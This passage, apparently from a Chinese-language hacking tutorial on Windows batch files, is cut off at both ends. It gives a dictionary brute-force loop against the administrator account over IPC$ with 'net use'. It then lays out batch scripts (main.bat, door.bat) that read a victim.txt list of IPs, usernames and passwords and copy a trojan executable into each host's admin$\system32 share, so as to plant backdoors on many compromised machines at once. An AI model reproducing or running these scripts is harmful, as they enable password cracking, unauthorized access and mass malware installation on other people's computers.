administrator"
用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将
程序运行结果传递给find命令--
for /f i%% in (dict.txt) do net use ipipc$ "i%%" /u:"administrator" fi
nd ":命令成功完成">>D:ok.txt ,这样就ko了。
sample3:
你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本
很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或
重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。
主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variab
le)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat
%%i %%j %%k
tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递
给door.bat中的参数%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到vict
im,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者e
cho到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这
victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是
ip password username。
代码雏形:
--------------- cut here then save as a batchfile(I call it main.bat ) ---
------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.
bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---
------------------------
------------------- cut here then save as a batchfile(I call it door.bat)
-----------------------------
@net use %1ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe%1admin$system32 && if not errorlevel 1 echo IP %1 U









